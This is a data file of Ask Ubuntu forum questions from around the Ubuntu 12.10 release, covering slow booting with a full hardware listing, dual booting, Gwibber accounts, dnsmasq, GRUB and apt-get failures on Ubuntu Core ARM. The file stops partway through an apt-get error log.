207230	why did ubuntu suddenly get so slow ?	12.10 has been slowing down mysteriously . normally , in past versions , i can log in , open firefox , and it will pop up within seconds . 12.10 is like that upon install too , though once i install my old apps , it gets very slow by ubuntu standards . after login the hard drive will just make noise for a while before the os will do anything . hardware : enter description : desktop computer product : xps 8300 ( ) vendor : dell inc. serial : b6g2wr1 width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall32 configuration : boot=normal chassis=desktop uuid=44454c4c-3600-1047-8032-c2c04f575231 core description : motherboard product : 0y2mrg vendor : dell inc. physical id : 0 version : a00 serial : ..cn7360419g04vq . slot : to be filled by o.e.m . *cpu description : cpu product : intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz serial : to be filled by o.e.m . slot : cpu 1 size : 1600mhz capacity : 1600mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=1 threads=2 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 256kib capacity : 256kib capabilities : internal write-through unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 1mib capacity : 1mib capabilities : internal write-through unified *-cache:2 disabled description : l3 cache physical id : 7 slot : l3-cache size : 8mib capacity : 8mib capabilities : internal write-back unified *-memory description : system memory physical id : 20 slot : system board or motherboard size : 8gib *-bank:0 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0nf-cg vendor : nanya physical id : 0 serial : 7228183 slot : dimm3 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0nf-cg vendor : nanya physical id : 1 serial : 1e28183 slot : dimm1 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0nf-cg vendor : nanya physical id : 2 serial : 9e28183 slot : dimm4 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:3 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : nt2gc64b88b0nf-cg vendor : nanya physical id : 3 serial : 5527183 slot : dimm2 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-firmware description : bios vendor : dell inc. physical id : 0 version : a05 date : 09/21/2011 size : 64kib capacity : 4032kib capabilities : mca pci upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb zipboot biosbootspecification *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : fe600000-fe6fffff ioport : d0000000 ( size=268435456 ) *-display description : vga compatible controller product : juniper [ radeon hd 5700 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:44 memory : d0000000-dfffffff memory : fe620000-fe63ffff ioport : e000 ( size=256 ) memory : fe600000-fe61ffff *-multimedia description : audio device product : juniper hdmi audio [ radeon hd 5700 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : fe640000-fe643fff *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:45 memory : fe708000-fe70800f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : fe707000-fe7073ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : fe700000-fe703fff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 memory : fe500000-fe5fffff *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:16 memory : fe500000-fe503fff *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 memory : fe400000-fe4fffff *-network description : ethernet interface product : netlink bcm57788 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 01 serial : 18:03:73 : e1 : a7:71 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=sb ip=192.168.1.3 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:47 memory : fe400000-fe40ffff *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : fe706000-fe7063ff *-isa description : isa bridge product : h67 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series/c200 series chipset family sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:43 ioport : f070 ( size=8 ) ioport : f060 ( size=4 ) ioport : f050 ( size=8 ) ioport : f040 ( size=4 ) ioport : f020 ( size=32 ) memory : fe705000-fe7057ff *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : fe704000-fe7040ff ioport : f000 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : hitachi hua72201 vendor : hitachi physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : jp4o serial : jpw9j0hd21btzc size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000641dc *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 4e3d91b7-fd38-4f44-a9e9-ba3c39b926ec size : 585gib capacity : 585gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-10-21 16:26:50 filesystem=ext4 lastmountpoint=/ modified=2012-10-29 18:12:08 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2012-10-29 18:12:08 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 7823mib capacity : 7823mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 7823mib capabilities : nofs *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 84a92aae-347b-7940-a2d1-f4745b885ef2 size : 337gib capacity : 337gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2012-10-21 18:43:39 filesystem=ntfs modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-scsi:1 physical id : 2 logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : dvdrwbd dh-12e3s vendor : plds physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : md11 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-scsi:2 physical id : 3 bus info : usb @ 2:1.8 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk:0 description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb configuration : sectorsize=512 *-disk:1 description : scsi disk physical id : 0.0.1 bus info : scsi @ 6:0.0.1 logical name : /dev/sdc configuration : sectorsize=512 *-disk:2 description : scsi disk physical id : 0.0.2 bus info : scsi @ 6:0.0.2 logical name : /dev/sdd configuration : sectorsize=512 *-disk:3 description : scsi disk product : ms/ms-pro vendor : generic- physical id : 0.0.3 bus info : scsi @ 6:0.0.3 logical name : /dev/sde version : 1.03 serial : 3 capabilities : removable configuration : sectorsize=512 *-medium physical id : 0 logical name : /dev/sde
207242	ubuntu 12.10 dual boot on a small ssd	i 'm thinking about buying a laptop with a setup like this : - 750 gb hdd - 32 gb ssd it comes preinstalled with windows 8 . i would like to dual boot ubuntu 12.10 with it on the ssd and i 'm wondering if the 32 gb ssd wo n't be too small for that . if i remove windows completely then i probably would be fine - but will they both fit ? w8 will probably need something between 16-20
207243	why is the amazon and ubuntu one music webapp part of common ? can it be removed without removing all others ?	i 've just noticed that those two , which i have completely no use of , are part of the common package . this means i can not remove them without removing everything . but i like all the other webapps , gmail , docs and so on . i just do n't want amazon popping up in my launcher when i go there once a blue moon and not leaving until i turn firefox off . is there any way i can remove it without removing the rest ?
207244	how do i remove my facebook account from gwibber ?	i started using ubuntu 12.10 today , and put in my social networking details in online accounts under system settings . i like being able to chat with my facebook friends in empathy , but i do n't necessarily want my tweets to go to facebook . i want to remove facebook from gwibber , but not empathy . how do i do this ? there is nothing in gwibber preferences and i ca n't see how to do it in online accounts . the reason i want to remove it is that it is n't clear enough which accounts are posted to and i do n't necessarily want the feeds mixing together .
207248	issues with nautilus 3.6 after upgrading from v3.4 12.10	in version 3.6 is that it can not save the change in view of folders and windows . everytime i close the window , the view is reset to default . anyone know any solution or facing the same problem ?
207251	boot with radeon 9600	i 'm trying to boot in to the live environment but i get a odd cloud of colour . i 'm guessing there is something up with the graphics card . i 've tried video=ofonly . i managed to get to the command line as ubuntu @ ubuntu . i would like to use the graphical installer as i 'm new to linux and , for now , a command based install is a little out of my comfort zone . i 've got a ati radeon 9600 with 128 mb of ddr sdram in my powermac g5 if that helps . i 've got an image but i 've not got the rating to uploaded it . i 've uploaded it here
207258	how can i modify my grub 1.99 configurations to install a new kernel ?	i have configured kernel 3.2.x and made some changes in the kernel . i have compiled it and have the compiled image of the kernel with me . the problem i am facing is as in how to modify the boot loader grub 1.99 in my case , so that i can boot through the new kernel i have compiled . i looked on net for any tutorials but all of them talked about older versions of grub ? can someone please give some info or point me towards some resource ? currently i have compiled my new custom kernel image and have copied it to /boot .
207264	software center does not start on ubuntu 12.10	did this to get a log : software-center -- debug 2 > & 1 | egrep -v `` file download|download for|download_file '' > softwarecenter.log log is shown here : http : //paste.ubuntu.com/1310174/
207265	how to download a file from a website via terminal ?	suppose that we have a full url of desired file e.g . http : //domain.com/directory/4 ? action=attachfile & do=view & target=file.tgz i would like to go without installing a new software . is it possible ? command cp 'http : //example.com/directory/4 ? action=attachfile & do=get & target=file.tgz ' hooray does n't work ; )
207269	dnsmasq works in terminal , but not applications in ubuntu 12.04	i am attempting in effect to add server=/example.com/11.22.33.44 to the configuration of dnsmasq in order to route queries for example.com to a specific nameserver . to implement this i did the following . i comment out the line dns=dnsmasq in /etc/networkmanager/networkmanager.conf and restarted network-manager i apt-get install dnsmasq i edit /etc/dnsmasq.conf to my needs and restart dnsmasq from my terminal , tests like host foo.example.com work correctly . but all applications ( e.g . firefox , midori , remmina ) seem to use the `` old '' settings ( that is i see dns queries go out and fail with tcpdump ) . i am lost how to merge automagic and manual settings like this . edit : meanwhile i have even tried unusual and desparate measures ( e.g. , rebooting ) without success . also it seems that the distinction is not reminal vs. other apps . rather even in a single terminal session i observe # host foo.example.com foo.example.com has address 1.2.3.4 # ping foo.example.com ping : unknown host foo.example.com ultimately , this led me to the solution . and admittedly this is an example where exaggerated anonymization made the question unanswerable : my domain in question is actually a subdomain of .local , which mdns steals away from proper dns . editing /etc/nsswitch.conf solved the problem .
207274	remove terminal titlebar on gnome without compiz	i ca n't seem to run compiz on my rig for some reason . i 've installed gnome 3 and i am running ubuntu 12.10 . i am pleased with the current setup but i would like to remove the titlebar from the terminal and i see that if through compiz this can be achieved with much ease , but i ca n't seem to start compiz so if there 's another way to do this could someone help ? i am interested to know of a general way to do this so i can later apply it to other applications i might want to run borderless . for the terminal i am currently running the tmux terminal .
207277	wpa2 enterprise authenticate fail	i installed lubuntu 12.10 on dell idea-pad 10-2 . this model has broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) as wireless module . i tried to use driver from both firmware-b43-lpphy-installer and bcmwl-kernel-source and both also worked fine when connect to the internet . however , i can not connect to the point that use wpa2 enterprise . it 's continuing ask for the password all the time and not connected . could you please suggest any idea to solve this problem ? thanks in advance . result from sudo lshw -class network : *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : 00:25:56 : b9:92:21 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 ip=192.168.0.101 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory:96100000-96103fff from rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no from lsmod | grep wl : wl 2442848 0 lib80211 14040 2 lib80211_crypt_tkip , wl from lspci|grep network : 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
207279	how do i install unity ?	i am completely new to ubuntu and i have no idea how to install it correctly . the command sudo apt-get install unity does n't work , and i do n't know how to fix it ...
207282	how do i install star wars battlefront 1 ?	i can install most windows games but i ca n't install star wars battlefront on my ubuntu 12.10 laptop computer .
207283	chromium web-app creation does n't work in 12.10 ?	if you create an application of a website in chromium and choose `` desktop '' , a .desktop file is created . in 12.04 , you were able to move it to ~/.local/share/applications/ and then start it from the dash or the launcher . in my fresh 12.10 installation , this does n't work anymore . i think the line that is misinterpreted is exec=/usr/bin/chromium-browser -- app=http : //buymeapie.com/ . if you try to run it from a terminal , you get the following result : 20:32 ~ speter > exec=/usr/bin/chromium-browser -- app=http : //buymeapie.com/ bash : -- app=http : //buymeapie.com/ : datei oder verzeichnis nicht gefunden ( english : `` file or directory not found '' ) . can anyone explain or knows a workaround ?
207284	installing plesk on ubuntu 11.04 ?	can someone tell me how i can install plesk panel on ubuntu 11.04 ? i ca n't find an version on the customer page and the setup tells me : installation will not continue because your operating system '' 'ubuntu ' 'linux ' '11.04 ' 'x86_64 ' under vz '' is not supported .
207285	how to use apt-get on ubuntu core arm ?	i have running ubuntu core on my pandaboard following this guide . ubuntu core has apt-get so i can install new packages but everything i want to install fails . i have used : apt-get update apt-get update -- fix-missing apt-get install xxxx apt-get upgrade but always getting errors . if i disconnect internet i get exactly the same error so i think i am not getting internet from my ethernet cable . i have installed ubuntu server and i can install everything correctly but ubuntu server is 1.6gb vs 20mb of ubuntu core . ubuntu core is supposed to have internet access but i ca n't even test it because i do n't have `` ping '' . for example , here is what i get when tried to install apt-get install aptitude : root @ localhost : /home/andres # apt-get install aptitude reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : apt-xapian-index file iso-codes libapt-inst1.4 libboost-iostreams1.46.1 libclass-accessor-perl libclass-isa-perl libcwidget3 libept1.4.12 libexpat1 libgdbm3 libio-string-perl liblocale-gettext-perl libmagic1 libparse-debianchangelog-perl libsigc++-2.0-0c2a libsqlite3-0 libsub-name-perl libswitch-perl libtimedate-perl libxapian22 lsb-release mime-support netbase perl perl-modules python python-apt python-apt-common python-chardet python-debian python-xapian python2.7 xz-lzma suggested packages : app-install-data python-xdg aptitude-doc-en aptitude-doc tasksel debtags isoquery libcwidget-dev libhtml-parser-perl libhtml-template-perl libxml-simple-perl xapian-tools lsb perl-doc libterm-readline-gnu-perl libterm-readline-perl-perl make libpod-plainer-perl python-doc python-tk python-apt-dbg python-gtk2 python-vte python-apt-doc xapian-doc python2.7-doc binutils the following new packages will be installed : apt-xapian-index aptitude file iso-codes libapt-inst1.4 libboost-iostreams1.46.1 libclass-accessor-perl libclass-isa-perl libcwidget3 libept1.4.12 libexpat1 libgdbm3 libio-string-perl liblocale-gettext-perl libmagic1 libparse-debianchangelog-perl libsigc++-2.0-0c2a libsqlite3-0 libsub-name-perl libswitch-perl libtimedate-perl libxapian22 lsb-release mime-support netbase perl perl-modules python python-apt python-apt-common python-chardet python-debian python-xapian python2.7 xz-lzma 0 upgraded , 35 newly installed , 0 to remove and 0 not upgraded . need to get 18.3 mb of archives . after this operation , 65.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //ports.ubuntu.com/ubuntu-ports/ precise/main liblocale-gettext-perl armhf 1.05-7build1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-updates/main libsqlite3-0 armhf 3.7.9-2ubuntu1.1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libgdbm3 armhf 1.8.3-10 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libsigc++-2.0-0c2a armhf 2.2.10-0ubuntu2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libmagic1 armhf 5.09-2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main file armhf 5.09-2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main mime-support all 3.51-1ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-updates/main python2.7 armhf 2.7.3-0ubuntu3.1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python armhf 2.7.3-0ubuntu2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main lsb-release all 4.0-0ubuntu20 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main netbase all 4.47ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main iso-codes all 3.31-1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python-apt-common all 0.8.3ubuntu7 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python-apt armhf 0.8.3ubuntu7 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main xz-lzma all 5.1.1alpha+20110809-3 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libxapian22 armhf 1.2.8-1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python-xapian armhf 1.2.8-1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python-chardet all 2.0.1-2build1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main python-debian all 0.1.21ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main apt-xapian-index all 0.44ubuntu5 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libboost-iostreams1.46.1 armhf 1.46.1-7ubuntu3 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libcwidget3 armhf 0.5.16-3.1ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libept1.4.12 armhf 1.0.6~exp1ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main aptitude armhf 0.6.6-1ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libswitch-perl all 2.16-2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libclass-isa-perl all 0.36-3 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-updates/main perl-modules all 5.14.2-6ubuntu2.1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-updates/main perl armhf 5.14.2-6ubuntu2.1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libsub-name-perl armhf 0.05-1build2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libclass-accessor-perl all 0.34-1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libio-string-perl all 1.08-2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libtimedate-perl all 1.2000-1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise/main libparse-debianchangelog-perl all 1.2.0-1ubuntu1 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-security/main libapt-inst1.4 armhf 0.8.16~exp12ubuntu10.2 temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com/ubuntu-ports/ precise-security/main libexpat1 armhf 2.0.1-7.2ubuntu1.1 temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/a/apt/libapt-inst1.4_0.8.16~exp12ubuntu10.2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libl/liblocale-gettext-perl/liblocale-gettext-perl_1.05-7build1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/s/sqlite3/libsqlite3-0_3.7.9-2ubuntu1.1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/g/gdbm/libgdbm3_1.8.3-10_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/e/expat/libexpat1_2.0.1-7.2ubuntu1.1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libs/libsigc++-2.0/libsigc++-2.0-0c2a_2.2.10-0ubuntu2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/f/file/libmagic1_5.09-2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/f/file/file_5.09-2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/m/mime-support/mime-support_3.51-1ubuntu1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/python2.7/python2.7_2.7.3-0ubuntu3.1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/python-defaults/python_2.7.3-0ubuntu2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/l/lsb/lsb-release_4.0-0ubuntu20_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/n/netbase/netbase_4.47ubuntu1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/i/iso-codes/iso-codes_3.31-1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/python-apt/python-apt-common_0.8.3ubuntu7_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/python-apt/python-apt_0.8.3ubuntu7_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/x/xz-utils/xz-lzma_5.1.1alpha+20110809-3_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/x/xapian-core/libxapian22_1.2.8-1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/x/xapian-bindings/python-xapian_1.2.8-1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/c/chardet/python-chardet_2.0.1-2build1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/python-debian/python-debian_0.1.21ubuntu1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/a/apt-xapian-index/apt-xapian-index_0.44ubuntu5_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/b/boost1.46/libboost-iostreams1.46.1_1.46.1-7ubuntu3_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/c/cwidget/libcwidget3_0.5.16-3.1ubuntu1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libe/libept/libept1.4.12_1.0.6~exp1ubuntu1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/a/aptitude/aptitude_0.6.6-1ubuntu1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libs/libswitch-perl/libswitch-perl_2.16-2_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libc/libclass-isa-perl/libclass-isa-perl_0.36-3_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/perl/perl-modules_5.14.2-6ubuntu2.1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/perl/perl_5.14.2-6ubuntu2.1_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libs/libsub-name-perl/libsub-name-perl_0.05-1build2_armhf.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libc/libclass-accessor-perl/libclass-accessor-perl_0.34-1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : 